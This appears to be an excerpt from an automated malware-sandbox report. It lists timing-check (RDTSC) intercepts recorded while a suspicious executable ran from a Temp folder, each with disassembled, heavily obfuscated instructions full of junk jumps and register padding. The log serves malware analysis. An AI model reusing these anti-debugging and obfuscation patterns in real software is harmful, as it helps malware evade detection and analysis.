                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0247 second address: 53A0281 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d push eax 0x0000000e mov ebx, 37F9ED46h 0x00000013 pop edx 0x00000014 mov cl, D0h 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F34D8F44CC0h 0x00000021 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0281 second address: 53A0285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A0285 second address: 53A028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A028B second address: 53A029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D94219DDh 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A029C second address: 53A02D9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d jmp 00007F34D8F44CBCh 0x00000012 mov edx, ecx 0x00000014 popad 0x00000015 mov ebp, esp 0x00000017 jmp 00007F34D8F44CBCh 0x0000001c pop ebp 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A02D9 second address: 53A02DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A02DD second address: 53A02E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53A02E3 second address: 53A02E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C065B second address: 53C066F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC0h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C066F second address: 53C0721 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c jmp 00007F34D94219E6h 0x00000011 push eax 0x00000012 pushad 0x00000013 mov ebx, 6EF02304h 0x00000018 pushad 0x00000019 call 00007F34D94219E3h 0x0000001e pop esi 0x0000001f pushfd 0x00000020 jmp 00007F34D94219E9h 0x00000025 adc ch, FFFFFFA6h 0x00000028 jmp 00007F34D94219E1h 0x0000002d popfd 0x0000002e popad 0x0000002f popad 0x00000030 xchg eax, ecx 0x00000031 pushad 0x00000032 pushfd 0x00000033 jmp 00007F34D94219DCh 0x00000038 or ecx, 2665AD48h 0x0000003e jmp 00007F34D94219DBh 0x00000043 popfd 0x00000044 movzx esi, bx 0x00000047 popad 0x00000048 mov eax, dword ptr [76FB65FCh] 0x0000004d jmp 00007F34D94219DBh 0x00000052 test eax, eax 0x00000054 push eax 0x00000055 push edx 0x00000056 push eax 0x00000057 push edx 0x00000058 push eax 0x00000059 push edx 0x0000005a rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0721 second address: 53C0725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0725 second address: 53C0729 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0729 second address: 53C072F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C072F second address: 53C07CA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F354AF94BFFh 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F34D94219DEh 0x00000016 adc al, 00000008h 0x00000019 jmp 00007F34D94219DBh 0x0000001e popfd 0x0000001f movzx esi, di 0x00000022 popad 0x00000023 mov ecx, eax 0x00000025 jmp 00007F34D94219DBh 0x0000002a xor eax, dword ptr [ebp+08h] 0x0000002d jmp 00007F34D94219DFh 0x00000032 and ecx, 1Fh 0x00000035 jmp 00007F34D94219E6h 0x0000003a ror eax, cl 0x0000003c jmp 00007F34D94219E0h 0x00000041 leave 0x00000042 push eax 0x00000043 push edx 0x00000044 jmp 00007F34D94219E7h 0x00000049 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C07CA second address: 53C081D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00A72014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F34DD8D54D0h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007F34D8F44CBEh 0x0000002b pop eax 0x0000002c pushad 0x0000002d push eax 0x0000002e push edx 0x0000002f pushfd 0x00000030 jmp 00007F34D8F44CBCh 0x00000035 or esi, 7CAE6DE8h 0x0000003b jmp 00007F34D8F44CBBh 0x00000040 popfd 0x00000041 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C081D second address: 53C08A2 instructions: 0x00000000 rdtsc 0x00000002 call 00007F34D94219E8h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a call 00007F34D94219DBh 0x0000000f call 00007F34D94219E8h 0x00000014 pop eax 0x00000015 pop ebx 0x00000016 popad 0x00000017 ret 0x00000018 nop 0x00000019 push eax 0x0000001a call 00007F34DDDB2260h 0x0000001f mov edi, edi 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F34D94219DCh 0x00000028 jmp 00007F34D94219E5h 0x0000002d popfd 0x0000002e movzx eax, di 0x00000031 popad 0x00000032 push esp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F34D94219E2h 0x0000003c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C08A2 second address: 53C08A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C08A6 second address: 53C08AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C08AC second address: 53C08FF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D8F44CC3h 0x00000009 adc eax, 4EEBD2AEh 0x0000000f jmp 00007F34D8F44CC9h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007F34D8F44CBEh 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C08FF second address: 53C0903 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53C0903 second address: 53C0920 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370078 second address: 537007C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 537007C second address: 5370099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370099 second address: 537009F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 537009F second address: 53700C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov dh, ch 0x0000000c movsx edx, ax 0x0000000f popad 0x00000010 mov dword ptr [esp], ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F34D8F44CC0h 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53700C6 second address: 53700D5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53700D5 second address: 53700DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53700DB second address: 53700DF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53700DF second address: 5370127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F34D8F44CC9h 0x00000011 pushfd 0x00000012 jmp 00007F34D8F44CC0h 0x00000017 add si, A818h 0x0000001c jmp 00007F34D8F44CBBh 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370127 second address: 537018C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F34D94219DFh 0x00000009 sbb ch, FFFFFFDEh 0x0000000c jmp 00007F34D94219E9h 0x00000011 popfd 0x00000012 call 00007F34D94219E0h 0x00000017 pop ecx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov dword ptr [esp], ebx 0x0000001e jmp 00007F34D94219E1h 0x00000023 mov ebx, dword ptr [ebp+10h] 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 movsx edi, cx 0x0000002c mov dx, ax 0x0000002f popad 0x00000030 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 537018C second address: 5370192 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370192 second address: 5370196 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 537027E second address: 5370296 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC4h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370296 second address: 53702AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test esi, esi 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53702AF second address: 53702B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53702B3 second address: 53702CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53702CE second address: 53702D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53702D4 second address: 5370370 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F354AFDFD06h 0x00000011 pushad 0x00000012 mov ax, bx 0x00000015 popad 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F34D94219E3h 0x00000024 jmp 00007F34D94219E3h 0x00000029 popfd 0x0000002a pushfd 0x0000002b jmp 00007F34D94219E8h 0x00000030 sub si, 7888h 0x00000035 jmp 00007F34D94219DBh 0x0000003a popfd 0x0000003b popad 0x0000003c je 00007F354AFDFCB6h 0x00000042 pushad 0x00000043 mov si, 561Bh 0x00000047 pushad 0x00000048 push ecx 0x00000049 pop edi 0x0000004a mov esi, 633D75C9h 0x0000004f popad 0x00000050 popad 0x00000051 mov edx, dword ptr [esi+44h] 0x00000054 push eax 0x00000055 push edx 0x00000056 jmp 00007F34D94219DBh 0x0000005b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370370 second address: 5370376 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370376 second address: 5370387 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or edx, dword ptr [ebp+0Ch] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov edx, ecx 0x00000010 popad 0x00000011 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5370387 second address: 53703A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F34D8F44CC7h 0x00000009 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53606BE second address: 53606C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53606C2 second address: 53606C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53606C8 second address: 53606CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53606CE second address: 53606D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53606D2 second address: 536077E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F34D94219E1h 0x00000013 xor si, A6D6h 0x00000018 jmp 00007F34D94219E1h 0x0000001d popfd 0x0000001e mov edx, ecx 0x00000020 popad 0x00000021 xchg eax, ebp 0x00000022 pushad 0x00000023 mov ecx, 67A74B3Fh 0x00000028 mov esi, 0C4F5C5Bh 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 pushad 0x00000031 mov esi, 545AFBD3h 0x00000036 pushad 0x00000037 mov di, ax 0x0000003a pushfd 0x0000003b jmp 00007F34D94219E2h 0x00000040 sub eax, 62ED9758h 0x00000046 jmp 00007F34D94219DBh 0x0000004b popfd 0x0000004c popad 0x0000004d popad 0x0000004e and esp, FFFFFFF8h 0x00000051 jmp 00007F34D94219E6h 0x00000056 xchg eax, ebx 0x00000057 push eax 0x00000058 push edx 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536077E second address: 5360782 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360782 second address: 5360786 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360786 second address: 536078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536078C second address: 53607D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F34D94219DBh 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 movsx ebx, si 0x00000016 pushfd 0x00000017 jmp 00007F34D94219DCh 0x0000001c add ah, 00000078h 0x0000001f jmp 00007F34D94219DBh 0x00000024 popfd 0x00000025 popad 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53607D4 second address: 5360816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a jmp 00007F34D8F44CBEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 jmp 00007F34D8F44CBCh 0x00000018 mov esi, 48DA2711h 0x0000001d popad 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360816 second address: 536081C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536081C second address: 536085B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c jmp 00007F34D8F44CBEh 0x00000011 mov esi, dword ptr [ebp+08h] 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F34D8F44CBAh 0x0000001d rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536085B second address: 5360861 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360861 second address: 5360867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360867 second address: 536086B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536086B second address: 53608A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CC8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub ebx, ebx 0x0000000d jmp 00007F34D8F44CC1h 0x00000012 test esi, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov dx, si 0x0000001a popad 0x0000001b rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53608A5 second address: 53608AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53608AB second address: 53608E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F354AB0A786h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx ebx, si 0x00000017 call 00007F34D8F44CC4h 0x0000001c pop ecx 0x0000001d popad 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53608E0 second address: 53608E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53608E6 second address: 53608EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53608EA second address: 53608EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53608EE second address: 536091B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F34D8F44CC6h 0x00000014 mov ecx, esi 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 movzx ecx, dx 0x0000001c rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536091B second address: 536092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, dx 0x00000007 popad 0x00000008 je 00007F354AFE7456h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536092F second address: 5360935 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360935 second address: 536093B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536093B second address: 5360977 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D8F44CBDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test byte ptr [76FB6968h], 00000002h 0x00000012 jmp 00007F34D8F44CBEh 0x00000017 jne 00007F354AB0A709h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F34D8F44CBAh 0x00000026 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360977 second address: 536097B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 536097B second address: 5360981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360981 second address: 53609E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F34D94219DEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F34D94219E0h 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F34D94219E0h 0x00000017 push eax 0x00000018 jmp 00007F34D94219DBh 0x0000001d xchg eax, ebx 0x0000001e jmp 00007F34D94219E6h 0x00000023 xchg eax, ebx 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 push esi 0x00000028 pop edx 0x00000029 rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 53609E0 second address: 5360A1B instructions: 0x00000000 rdtsc 0x00000002 mov ax, ECFFh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebx, ecx 0x0000000a popad 0x0000000b push eax 0x0000000c jmp 00007F34D8F44CC1h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 mov bx, cx 0x00000016 push eax 0x00000017 push edx 0x00000018 call 00007F34D8F44CC6h 0x0000001d pop ecx 0x0000001e rdtsc
                        Source: C:\Users\user\AppData\Local\Temp\JJEGIJEGDB.exeRDTSC instruction interceptor: First address: 5360A1B second address: 5360A5A instructions: 0x00000000 rdtsc 0x00000002 mov dh, 8Dh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push dword ptr [ebp+14h] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F34D94219DFh 0x00000013 xor cx, 138Eh 0x00000018 jmp 00007F34D94219E9h 0x0000001d popfd 0x0000001e mov ch, 9Eh 0x00000020 popad 0x00000021 rdtsc
